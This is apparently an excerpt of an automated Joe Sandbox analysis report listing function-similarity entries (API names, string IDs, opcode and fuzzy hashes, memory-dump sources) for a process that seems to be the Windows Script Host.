                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateOpen_vsnprintf
                                                                                                                                                • String ID: SOFTWARE\Classes\%s\%s$Shell
                                                                                                                                                • API String ID: 476925587-2614410927
                                                                                                                                                • Opcode ID: 5433c403d3cad10f16ce353cd70ae7a2d7c77152a449c57470574e65f349357d
                                                                                                                                                • Instruction ID: 0ab93d7d0e64bce538e3df9c15e0fbf4be01a72a11db9d1ecd5bd95a0e21691b
                                                                                                                                                • Opcode Fuzzy Hash: 5433c403d3cad10f16ce353cd70ae7a2d7c77152a449c57470574e65f349357d
                                                                                                                                                • Instruction Fuzzy Hash: 0A216521718B8281EB11EF65EC947A7A3A0FB887A4FC00131EA5EC7794DF2CE514C7A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharErrorLastMultiValueWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2367157299-0
                                                                                                                                                • Opcode ID: 465d2811773bb182646a5ff97fecd1111c80a7d09266cef83a9775a224eb1e8e
                                                                                                                                                • Instruction ID: c4d719a2f7b010d74900dfc5695f962d9594de78b98b4fdbbc7a255d922ff9c9
                                                                                                                                                • Opcode Fuzzy Hash: 465d2811773bb182646a5ff97fecd1111c80a7d09266cef83a9775a224eb1e8e
                                                                                                                                                • Instruction Fuzzy Hash: F731C932614B8185E760DF21A85037AA394FB487B8F840335EA5E86BD4CF3CE1658750
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CountMessageTick$DispatchMultipleObjectsPeekWait
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4276921731-0
                                                                                                                                                • Opcode ID: 2b6174533ec8748a5d02c06003e4b154ca2dc3091372daa0d389b673074a00e1
                                                                                                                                                • Instruction ID: 9f4fbc8d3ec30cc6f15fb3b4e6c73d015b68311484901d8fa5d6f2ab7dcdef6d
                                                                                                                                                • Opcode Fuzzy Hash: 2b6174533ec8748a5d02c06003e4b154ca2dc3091372daa0d389b673074a00e1
                                                                                                                                                • Instruction Fuzzy Hash: 2D21F821F24A4186E312EF35984476AA2A5BF9C794F45C335DA4FE3710DF38E4578790
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessagePost$ClassNameParentVisibleWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1155528767-0
                                                                                                                                                • Opcode ID: d2cd9adbc0aeab92bbf37f732a4f9e168fa5aaffa090aa96134ed03ba59b53aa
                                                                                                                                                • Instruction ID: 4e392a9237235483bd06678eb6e71b4eebbe08ec45fe1c4539b34c9554388233
                                                                                                                                                • Opcode Fuzzy Hash: d2cd9adbc0aeab92bbf37f732a4f9e168fa5aaffa090aa96134ed03ba59b53aa
                                                                                                                                                • Instruction Fuzzy Hash: FA21B621A0C68242EB61EF25AC1037AE770EF457E4F841030D98E5BB54DF2CF8528BE0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy_s$FreeString
                                                                                                                                                • String ID: WSH
                                                                                                                                                • API String ID: 4021863947-2133009938
                                                                                                                                                • Opcode ID: 9c83da4f9e73a92d67dbac18e40294876c6c2d665ebb01c5f6b54aaa8719328a
                                                                                                                                                • Instruction ID: 24740b1076480433fe603220fe715c4fa6f620d75434043f50e98d6024b2bc9b
                                                                                                                                                • Opcode Fuzzy Hash: 9c83da4f9e73a92d67dbac18e40294876c6c2d665ebb01c5f6b54aaa8719328a
                                                                                                                                                • Instruction Fuzzy Hash: 0F516321618A5681EE21EF26DC40169A370FF84BF5F944232DA5E877A5CF3DF451C7A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$ErrorFreeInfo$AllocCreateLoad
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3761032807-0
                                                                                                                                                • Opcode ID: dc582211c869ebc6f38f02b8025d36d86266f469f7dfea9eef448f75d2a3ffcc
                                                                                                                                                • Instruction ID: 677c6a36a1e5f01d0d3c0c404101acbd5dfb50671e8905d93a71be281cc232e6
                                                                                                                                                • Opcode Fuzzy Hash: dc582211c869ebc6f38f02b8025d36d86266f469f7dfea9eef448f75d2a3ffcc
                                                                                                                                                • Instruction Fuzzy Hash: 90512F26B14A6686EB05DF66DC802AD6B74BB48FE8F404431DE0ED7B64DF38E455C3A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ArraySafe$AllocClearCreateElementStringVariant_malloc_dbg
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1842264155-0
                                                                                                                                                • Opcode ID: e9030f3e4b5bd63d7a906b22d24acdd081fd9caac9cf571c1f07528e9698edb3
                                                                                                                                                • Instruction ID: 95c4c242e7e48141fc3282f76775198894b2188d183623935bd22c3b77c0e81c
                                                                                                                                                • Opcode Fuzzy Hash: e9030f3e4b5bd63d7a906b22d24acdd081fd9caac9cf571c1f07528e9698edb3
                                                                                                                                                • Instruction Fuzzy Hash: 11519E72A08B4286E711DF24E840369B3B0FB58B68F950135DA4E87768EF3CE555C7E0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ArraySafe$AllocClearCreateElementStringVariant_malloc_dbg
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1842264155-0
                                                                                                                                                • Opcode ID: d299a61cbf46e01fe73576e71a2fed35a2251391d1c16dd6266a7be152351c4b
                                                                                                                                                • Instruction ID: 12f39745ec55adbfe7cd801d0a49c06ecebcc72ad09df92dee80a0b95959df04
                                                                                                                                                • Opcode Fuzzy Hash: d299a61cbf46e01fe73576e71a2fed35a2251391d1c16dd6266a7be152351c4b
                                                                                                                                                • Instruction Fuzzy Hash: EA519172619B4296E762DF15E9803A9B3A0FB48760F804135DA4E83B50EF3CF5B5C790
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 140117192-0
                                                                                                                                                • Opcode ID: fc5f688f5c065cb11c9ffca66ac3baa33a6afb08402088b8e1f511e0a50bb0f2
                                                                                                                                                • Instruction ID: c0f51afa9f0245378549c1a44807f6f751e5ec602e2fc167894e23d828d2cc2f
                                                                                                                                                • Opcode Fuzzy Hash: fc5f688f5c065cb11c9ffca66ac3baa33a6afb08402088b8e1f511e0a50bb0f2
                                                                                                                                                • Instruction Fuzzy Hash: 5441B839609B1285EB11EF48FC903A5B3A4FB88764FD04136E98E82764DF7DE564C7A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 140117192-0
                                                                                                                                                • Opcode ID: 4869cafc389b2c3fb2770f120654123f393a292d05354995f560dc96cefc7251
                                                                                                                                                • Instruction ID: 55f51e31e0f5ddda2ac9ed70c3ac6e8df4ac704d5b6116db969c9e1518782463
                                                                                                                                                • Opcode Fuzzy Hash: 4869cafc389b2c3fb2770f120654123f393a292d05354995f560dc96cefc7251
                                                                                                                                                • Instruction Fuzzy Hash: 6F21A339909B1285EB01EF44FC803A9A3A4FB84764F900136EA8E83764DF7DE165C7A4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$FreeLoad$ActiveAllocByteCharMessageMultiWideWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2643037684-0
                                                                                                                                                • Opcode ID: fb29466f0502cde8b2ef41bd7dc3bb2b9fb55c6feac7a0b9f1fe3ad8ea4e7ca4
                                                                                                                                                • Instruction ID: c66a5b8044deb2c520530073b781cf6a59f28d58396c8ca46d0eefce00125575
                                                                                                                                                • Opcode Fuzzy Hash: fb29466f0502cde8b2ef41bd7dc3bb2b9fb55c6feac7a0b9f1fe3ad8ea4e7ca4
                                                                                                                                                • Instruction Fuzzy Hash: 3501406191864782EB42FF60EC8036AA770FB94765F901030D94F82755DF2CE8658BB0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageMultipleObjectsPeekWait
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3986374578-0
                                                                                                                                                • Opcode ID: 4e0e757d067faf3c95b5bbc099de3210e0857e8a74d75ffd197bd8df6cc6fe89
                                                                                                                                                • Instruction ID: aefbd71e079e635b0495733e127b89edc26ac467442bc807b627ae5f216a79cc
                                                                                                                                                • Opcode Fuzzy Hash: 4e0e757d067faf3c95b5bbc099de3210e0857e8a74d75ffd197bd8df6cc6fe89
                                                                                                                                                • Instruction Fuzzy Hash: 35F03132E2854293EB60FF24EC54A69A661FF90334FD05235D19B81AD4DF3CE51ACBA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: cscript$wscript
                                                                                                                                                • API String ID: 0-3774417012
                                                                                                                                                • Opcode ID: cb76350cea9e31c165af64c11842f7dd4bbc18e01eced5b20fb5aa31136ffada
                                                                                                                                                • Instruction ID: e53ecd217127cd87c110b7f4fd8933a19f721a1d5234a8cb81718c2347cf8103
                                                                                                                                                • Opcode Fuzzy Hash: cb76350cea9e31c165af64c11842f7dd4bbc18e01eced5b20fb5aa31136ffada
                                                                                                                                                • Instruction Fuzzy Hash: C6E1E72290C28285EF35EF26985017AE6B0EB41779F964235DA5F877D9CB3CF901C7A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                • String ID: wscript
                                                                                                                                                • API String ID: 2882836952-434116418
                                                                                                                                                • Opcode ID: a904b209b09c7779b7f0d123877177c7efe453cd4cd34810e8214d5d51812d0f
                                                                                                                                                • Instruction ID: 4bfc755dd3a7493d0c7d5d759e758ac0f61afdcfc1ef35b53951054eb11256c9
                                                                                                                                                • Opcode Fuzzy Hash: a904b209b09c7779b7f0d123877177c7efe453cd4cd34810e8214d5d51812d0f
                                                                                                                                                • Instruction Fuzzy Hash: F7516E22A08B4242EA15EF21DD50379A3A0EF45BB4F844535DB0E977A5DF3CF465C3A4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ActiveWindow
                                                                                                                                                • String ID: WSH$WScript
                                                                                                                                                • API String ID: 2558294473-1019903269
                                                                                                                                                • Opcode ID: 1dfef353a55dc0303b0e82de307382898d7c27377db38ad579cf893b105a27eb
                                                                                                                                                • Instruction ID: a7ba4d8ce2ca0045ea5929f04d509dd64d3b48b96688004803eb9a917617d704
                                                                                                                                                • Opcode Fuzzy Hash: 1dfef353a55dc0303b0e82de307382898d7c27377db38ad579cf893b105a27eb
                                                                                                                                                • Instruction Fuzzy Hash: 151175A260868281E611EF69DC4013993B0EB44BB0F989231DE6EC77D4DF2DF451C354
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                • String ID: WSHRemote.Execute
                                                                                                                                                • API String ID: 2882836952-1341764647
                                                                                                                                                • Opcode ID: 83ee86308eadcab543354765f51cf13d8b09bca077f562c864ea0789ab55eecf
                                                                                                                                                • Instruction ID: fb3b8dc5bed1c25abdda614634a6e8e5f24d946c2ada64e693495540a51a131b
                                                                                                                                                • Opcode Fuzzy Hash: 83ee86308eadcab543354765f51cf13d8b09bca077f562c864ea0789ab55eecf
                                                                                                                                                • Instruction Fuzzy Hash: 7A116721E08A4286EB16EF25DC51178A271AB15B74F844135CA1FCA3E4DF2CF89987A4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00007FF7C0BA14A0: RegCreateKeyExW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B9D27D), ref: 00007FF7C0BA1502
                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 00007FF7C0B9D387
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreate
                                                                                                                                                • String ID: DisplayLogo$Timeout
                                                                                                                                                • API String ID: 2932200918-1251482861
                                                                                                                                                • Opcode ID: 49fe2ba6aa6f8ff55c7d354cebacde66ec740d3e4028e200a61d6407c0192856
                                                                                                                                                • Instruction ID: 2e2ac2cfda22698dc1f4c8d6febafbeb5bfca03d53a273b1cc1acba3a9eae5aa
                                                                                                                                                • Opcode Fuzzy Hash: 49fe2ba6aa6f8ff55c7d354cebacde66ec740d3e4028e200a61d6407c0192856
                                                                                                                                                • Instruction Fuzzy Hash: 4301C821B1C68241EB51EF16D840769A760EB847E1FC05031EA5FC7B95CF2CF494C750
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%